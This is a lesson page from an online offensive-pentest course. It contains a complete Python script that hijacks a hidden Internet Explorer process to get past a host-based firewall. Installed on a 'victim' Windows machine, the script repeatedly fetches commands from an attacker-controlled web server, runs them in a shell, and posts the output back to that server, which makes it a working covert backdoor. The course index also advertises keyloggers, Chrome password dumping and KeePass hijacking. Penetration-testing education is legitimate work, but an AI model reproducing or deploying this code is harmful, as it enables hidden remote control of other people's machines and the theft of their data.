Hickjack the Internet Explorer process to bypass an host-based firewall

From course: Python For Offensive PenTest: A Complete Practical Course.

General index of the course

• Gaining persistence shells (TCP + HTTP):
  • Coding a TCP connection and a reverse shell.
  • Coding a low level data exfiltration - TCP connection.
  • Coding an http reverse shell.
  • Coding a data exfiltration script for a http shell.
  • Tunning the connection attempts.
  • Including cd command into TCP reverse shell.
• Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bared attacker public ip.
  • Making your binary persistent.
  • Making a screenshot.
  • Coding a reverse shell that searches files.
• Techniques for bypassing filters:
  • Coding a reverse shell that scans ports.
  • Hickjack the Internet Explorer process to bypass an host-based firewall.
  • Bypassing Next Generation Firewalls.
  • Bypassing IPS with handmade XOR Encryption.
• Malware and crytography:
  • TCP reverse shell with AES encryption.
  • TCP reverse shell with RSA encryption.
  • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hickjacking:
  • Simple keylogger in python.
  • Hijacking Keepass Password Manager.
  • Dumping saved passwords from Google Chrome.
  • Man in the browser attack.
  • DNS Poisoning.
• Privilege escalation:
  • Weak service file permission.

For our script to bypass a host-based firewall (based on an ACL), we will hickjack the Internet Explorer process to conceal our traffick and bypass it.

Client side

Make sure that the victim machine (a windows 10) has installed these two python libraries: pypiwin32 and pywin32.

To be run on our victim's machine.

# Python For Offensive PenTest: A Complete Practical Course  - All rights reserved 
# Follow me on LinkedIn  https://jo.linkedin.com/in/python2

from win32com.client import Dispatch
from time import sleep
import subprocess

ie = Dispatch("InternetExplorer.Application") # Create browser instance.
ie.Visible = 0 # Make it invisible [ run in background ] (1= visible)

# Paramaeters for POST
dURL = "http://192.168.0.152"  
Flags = 0
TargetFrame = 0


while True:
    ie.Navigate("http://192.168.0.152") # Navigate to our kali web server (the attacker machine) to grab the hacker commands
    while ie.ReadyState != 4: # Wait for browser to finish loading.
        sleep(1)

    command = ie.Document.body.innerHTML 
    command = command.encode() # encode the command
    if 'terminate' in command.decode():
        ie.Quit() # quit the IE and end up the process
        break
    else:
        CMD = subprocess.Popen(command.decode(), shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
        Data = CMD.stdout.read()
        PostData = memoryview( Data ) # in order to submit or post data using COM technique , it requires to  buffer the data first using memoryview
        ie.Navigate(dURL, Flags, TargetFrame, PostData) # we post the comamnd execution result along with the post parameters which we defined eariler..

    sleep(3)

Last update: 2024-03-29
Created: April 10, 2023 16:52:50